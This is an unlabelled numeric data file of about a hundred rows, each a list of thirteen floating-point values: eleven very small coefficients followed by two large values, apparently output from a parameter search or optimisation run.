[-8.372802930516975e-10, -1.3398025228100945e-12, -1.9531413192683389e-13, 4.855683396544643e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.714032924475303e-16, 2.4957985197946978e-05, -1.793948394990656e-06, -1.836034443165441e-08, 9.081976758127089e-10, 159560429502.34207, 105861289429.36061]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.7864100157215748e-15, 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 147461834890.53723, 106068644665.40553]
[-8.372802930516975e-10, -1.3292316984383345e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4760843266911815e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.492800478197597e-05, -1.7933608637070708e-06, -1.836034443165441e-08, 9.087979750822277e-10, 147793960453.4741, 109638154986.2024]
[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8434260838579935e-11, -1.4561659265574012e-10, -1.819718397269023e-15, 8.775397316555329e-16, 2.4948775411850268e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.081976758127089e-10, 150492287670.62976, 114344342719.97507]
[-8.406587076953522e-10, -1.318355348076889e-12, -1.9519777560623135e-13, 4.855683396544643e-11, -1.4760843266911815e-10, -1.815921924023075e-15, 8.839563844754409e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.78632, 115101067854.31332]
[-8.389236670603421e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.717072130867646e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 137339476236.27339, 120797794814.05704]
[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.492800478197597e-05, -1.786297491730252e-06, -1.836034443165441e-08, 9.087619653117874e-10, 128365631923.39072, 133721716481.47603]
[-8.361552586353477e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.483403849637781e-05, -1.783565701728919e-06, -1.836034443165441e-08, 9.095300241628919e-10, 123047993752.2489, 147005409641.27127]
[-9.129396902499863e-10, -1.290047843436073e-12, -2.702634930634393e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1792166675464865e-15, 9.365717147446797e-16, 1.8994698205972217e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 169675879824.58978, 156722470654.13324]
[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, 4.701662665204773e-11, -1.4934765549498044e-10, -2.0495920936053975e-15, 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.48868, 167972224844.19583]
[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, 4.701662665204773e-11, -1.4986345441105813e-10, -2.0495920936053975e-15, 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.75635, 167972224843.92523]
[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, 192873830899.82352]
[6.303262263534727e-10, -1.290047843436073e-12, -2.5988950272728827e-13, 4.58556551164694e-11, -1.4986345441105813e-10, -2.1913589342035502e-15, 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 164354464752.25952, 160840990423.46024]
[6.354744988103506e-10, -1.2096663849982051e-12, -1.830526663998671e-13, 4.6589669053151376e-11, -1.4986345441105813e-10, -2.0495920936053975e-15, 8.502785255135087e-16, 1.894858193847651e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 96467208837.94556, 179586543004.98117]
[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, 4.58556551164694e-11, -1.8580228849463816e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.9540146753875297e-05, -1.8218396850604304e-06, -1.3360134446642706e-08, 8.759216763039946e-10, 117765020064.66293, 187118262382.8758]
[-9.129396902499863e-10, -1.3004166005044262e-12, -1.8356995493902235e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.962681376929987e-05, -1.8050933870374392e-06, -1.3418860642065019e-08, 8.693561802236366e-10, 122674650037.46736, 187415567631.77402]
[-9.212545260772544e-10, -1.2799153483071088e-12, -1.8213920664100724e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, 192873830899.82352]
[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, 4.6154548476823616e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.358479354640953e-16, 1.9540146753875297e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.02731, 192873830899.82806]
[2.2152115305769157e-10, -1.6907719215642795e-12, -2.5108769063589337e-13, 4.9793760275117476e-11, -2.0780774158604122e-10, -2.1593626664102876e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.77876424822685e-10, 170388218306.66492, 168925348515.4128]
[2.2152115305769157e-10, -1.6907719215642795e-12, -2.1051647732787472e-13, 4.9793760275117476e-11, -2.0780774158604122e-10, -2.1790706433018085e-15, 8.836470142939426e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.771058818345121e-10, 191821821495.1242, 158798904598.69617]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15, 8.836470142939426e-16, 2.0217203662255432e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.771058818345121e-10, 177069079234.4985, 163375067226.8736]
[2.213664545134999e-10, -1.2059133330572482e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.508245699810314e-08, 8.771058818345121e-10, 197879714583.27084, 152444791757.7255]
[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, 4.971358693780409e-11, -1.7352085678160897e-10, -2.165433707987142e-15, 7.304553415989529e-16, 2.0047355685146273e-05, -1.7657604268720381e-06, -1.4977385439375226e-08, 8.771058818345121e-10, 197945074606.02325, 153164597685.87036]
[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 111986329581.05826, 155849166742.8801]
[2.2133713135172913e-10, -1.2059133330572482e-12, -2.5107145183244764e-13, 5.011120217163613e-11, -1.724660990140153e-10, -2.1790706433018085e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.771058818345121e-10, 187269085984.5673, 161472427331.15216]
[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -2.145058695065051e-15, 7.430575474541962e-16, 2.0053347897812537e-05, -1.7639524821935923e-06, -1.4682044872577598e-08, 8.728626586100963e-10, 152433850624.54852, 175966043507.07343]
[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -2.1790706433018085e-15, 7.430575474541962e-16, 1.9918519209106862e-05, -1.7685796144533914e-06, -1.4682044872577598e-08, 8.771058818345121e-10, 153535961138.3572, 184829802626.36642]
[2.2152115305769157e-10, -1.200937983572784e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7420072583381303e-10, -1.8426407940693324e-15, 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.77588, 189416231139.84406]
[0.0, -1.2207456906260254e-12, -2.1065990049856794e-13, 4.9793760275117476e-11, -2.0772853669541976e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 1.9867416915370552e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.728626586100963e-10, 160631139543.06137, 122019730569.7476]
[2.2152115305769157e-10, -1.1984578022968498e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -1.857281675942834e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 153487531028.94116, 128597452665.91768]
[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]
[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, 161449199082.99103]
[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -1.857281675942834e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.769936435419886e-06, -1.4682044872577598e-08, 8.728626586100963e-10, 100156348461.68698, 161778485371.36353]
[0.0, -1.1984578022968498e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.760544278271184e-10, 100072993312.46272, 171303112707.4717]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 4.9793760275117476e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 8.836470142939426e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 97245352689.07887, 174341101475.58182]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9675085987122204e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 92503635735.71886, 182996786041.40976]
[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -2.1612081417375267e-15, 7.470344646267989e-16, 2.0053347897812537e-05, -1.7639524821935923e-06, -1.4645406166689473e-08, 8.730660207999707e-10, 148185335900.70355, 185221791801.95062]
[2.2111462065028517e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, 5.056589741460715e-11, -1.7420072583381303e-10, -1.8426407940693324e-15, 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.76936, 189416231139.85312]
[2.2152115305769157e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7420072583381303e-10, -1.8276902524925885e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.771058818345121e-10, 90666406593.2125, 190153350507.14474]
[2.2152115305769157e-10, -1.2049195466583994e-12, -2.1065990049856794e-13, 4.98075339514226e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 7.454251311051652e-16, 2.0095046248399238e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.771058818345121e-10, 89706134652.28279, 197738317572.1617]
[0.0, -1.2031098015567e-12, -2.1065990049856794e-13, 5.0102593857564815e-11, -1.7352085678160897e-10, -1.819039898810471e-15, 7.460417812765263e-16, 2.0200374650352852e-05, -1.7758673160173464e-06, -1.5202351660972107e-08, 8.760544278271184e-10, 160476853944.9334, 119035825863.27417]
[2.2152115305769157e-10, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5344868185414675e-08, 8.771058818345121e-10, 180743589801.84604, 120144468135.82727]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.947687927376915e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.04140411384885e-05, -1.7639524821935923e-06, -1.5078308038358913e-08, 8.683463468773267e-10, 146622662638.346, 120359956158.03543]
[0.0, -1.1984578022968498e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7813149517985466e-06, -1.5091093694835327e-08, 8.760544278271184e-10, 171477577754.58575, 120995758664.39177]
[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, 4.9967768219433575e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.703632209100975e-10, 151029089477.88403, 121221447183.73479]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, 123962248783.03809]
[2.233355889138985e-10, -1.2031098015567e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 148301377250.4212, 129257349906.46594]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.448076765658434e-16, 2.0200374650352852e-05, -1.7728642137544318e-06, -1.517941226634992e-08, 8.771058818345121e-10, 131981382341.97574, 129372470770.49553]
[0.0, -1.2031098015567e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 8.836470142939426e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]
[-5.2595470648843136e-09, -1.2003583976149596e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7461898455625076e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 142718091682.67987, 132029509845.4832]
[2.2257852388875064e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9793760275117476e-11, -1.7380412465809723e-10, -1.841021101878205e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 126150709659.35735, 137741348069.72827]
[0.0, -1.2344709098355012e-12, -2.090479539659853e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15, 7.485411998460075e-16, 1.981538293869461e-05, -1.769936435419886e-06, -1.4682044872577598e-08, 8.711551918674385e-10, 114088676894.18327, 143862344272.2216]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, 143868003797.30536]
[2.2152115305769157e-10, -1.2003583976149596e-12, -2.088572649745598e-13, 4.995108013618423e-11, -1.7207960562590789e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.015341505664753e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 115848531243.76457, 151496866956.06183]
[7.878840270455085e-09, -1.2071709641632366e-12, -2.088572649745598e-13, 5.022894055850661e-11, -1.7352085678160897e-10, -1.8610445297760222e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.760544278271184e-10, 113456911424.16617, 154679332976.7693]
[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.760544278271184e-10, 107979663117.77498, 158587944243.3901]
[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.451496753853957e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, 161449199082.99103]
[2.1977210438689425e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, 161449199082.99103]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.099781497267347e-13, 4.9793760275117476e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.0299458575301996e-05, -1.756844278469525e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 101036412554.48618, 178952195751.12357]
[0.0, -1.2071709641632366e-12, -2.088572649745598e-13, 4.9793760275117476e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7587739009571313e-06, -1.5202351660972107e-08, 8.768692858683927e-10, 101115281125.52821, 181312381109.07834]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9675085987122204e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 92503635735.71886, 182996786041.40976]
[2.2295275331941093e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9675085987122204e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 92503635735.71886, 182996786041.40976]
[0.0, -1.223723210207519e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7707453284878416e-10, -1.866210682668369e-15, 7.430575474541962e-16, 1.9722774245768875e-05, -1.769936435419886e-06, -1.4682044872577598e-08, 8.760544278271184e-10, 88317753591.74515, 193403737351.61066]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7493239251088378e-06, -1.5085870105283375e-08, 8.701394499644777e-10, 90763281590.1167, 199093039398.6542]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15, 7.387655049943961e-16, 1.981538293869461e-05, -1.769936435419886e-06, -1.4563889985865401e-08, 8.644597543611974e-10, 157634872361.7637, 120593643708.66519]
[2.2257852388875064e-10, -1.2070230966272908e-12, -2.1051647732787472e-13, 5.027931250826744e-11, -1.755220169767042e-10, -1.810973414699955e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 159354716917.0895, 121269083493.68436]
[0.0, -1.2031098015567e-12, -2.090479539659853e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8577367523496564e-15, 7.430575474541962e-16, 1.9814643005749893e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.711551918674385e-10, 168378423128.42877, 121439949900.90005]
[2.198369754018213e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7513929529124395e-10, -1.82610373802557e-15, 7.448076765658434e-16, 2.0042195789951223e-05, -1.7728642137544318e-06, -1.5013783998899997e-08, 8.734593739302048e-10, 147068576327.25705, 122027384226.92]
[2.2257852388875064e-10, -1.2059133330572482e-12, -2.090479539659853e-13, 4.9793760275117476e-11, -1.7849498396021264e-10, -1.841021101878205e-15, 7.556782953802372e-16, 2.022642042947946e-05, -1.769936435419886e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 149871632956.7388, 122750625888.09634]
[2.2152115305769157e-10, -1.2344709098355012e-12, -2.1013781830316155e-13, 5.011120217163613e-11, -1.7343044399460855e-10, -1.857281675942834e-15, 7.430575474541962e-16, 2.0343113714890682e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 151082881535.07886, 122935226427.98189]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, 123962248783.03809]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.735477478457909e-10, 133427418313.38545, 131702579310.68652]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.116126459765591e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 137250169853.3863, 133211383937.09729]
[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99263, 143105235055.608]
[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69511, 143860615432.91934]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 118202331336.15999, 145092770865.8836]
[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.760544278271184e-10, 110377805870.9487, 155477031697.76462]
[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7281503437685213e-10, -1.82610373802557e-15, 8.836470142939426e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.760544278271184e-10, 107979663117.63412, 158587944243.89005]
[0.0, -1.2031098015567e-12, -2.522559178506789e-13, 5.003845283040925e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.9950498914670327e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.760544278271184e-10, 99132279868.34593, 171185572417.85907]
[2.2257852388875064e-10, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 8.811799226535086e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.508244156181531e-08, 8.760544278271184e-10, 93130287119.72461, 180430143233.58368]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8265258253512156e-15, 7.430575474541962e-16, 2.0240988631290876e-05, -1.7728642137544318e-06, -1.5013783998899997e-08, 8.784555835692595e-10, 86927194519.4496, 183449646874.34637]
[7.863427642383715e-09, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.750599822793858e-10, 87084714365.5935, 191076754457.2524]
[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15, 7.485411998460075e-16, 1.9750639916729973e-05, -1.769936435419886e-06, -1.5013783998899997e-08, 8.825388912755251e-10, 96474604776.96465, 194275355409.06598]
[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.503739318330452e-08, 8.760544278271184e-10, 86984982238.58047, 194967876303.00238]
[1.5200576895768509e-09, -1.2059133330572482e-12, -2.0752021923147355e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 7.479116563110691e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.4682044872577598e-08, 8.724478065416361e-10, 82147238279.93182, 198112832281.90573]
[2.223825616669009e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7326944854292794e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.534155691698868e-08, 8.721578527250325e-10, 175522473614.0067, 115813093887.0164]
[2.2296631466270538e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.430575474541962e-16, 2.0431066002844864e-05, -1.7780476812466564e-06, -1.5013783998899997e-08, 8.717160979795123e-10, 146919548917.9041, 118508631814.89664]
[2.2152115305769157e-10, -1.2131115225525171e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.529126273308479e-08, 8.750599822793858e-10, 189141514324.11395, 119478476003.54858]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.515944456372276e-08, 8.735477478457909e-10, 171393648132.89902, 119746195767.88297]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.680779846505464e-10, 198413310387.34686, 120002114057.9749]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, 123962248783.03809]
[2.2152115305769157e-10, -1.1981340041661674e-12, -2.0952905567462806e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.397318554179349e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.721578527250325e-10, 146191133033.73245, 124495463707.0261]
[2.220169404817274e-10, -1.2059133330572482e-12, -2.0840667223230766e-13, 5.0388416851351e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.535159731564839e-08, 8.794413360449789e-10, 153568856127.85236, 127226107362.62663]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.476241521935537e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.504298228349246e-08, 8.735477478457909e-10, 140382068840.41766, 128048566261.66084]
[-9.575357968769427e-09, -1.2140137633227375e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.747166095423015e-10, -1.842789515995345e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.761484506217259e-06, -1.520980077906525e-08, 8.721578527250325e-10, 135600496522.7375, 129146670219.88675]
[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.449634745732176e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.735477478457909e-10, 131821303340.10287, 132556338910.10567]
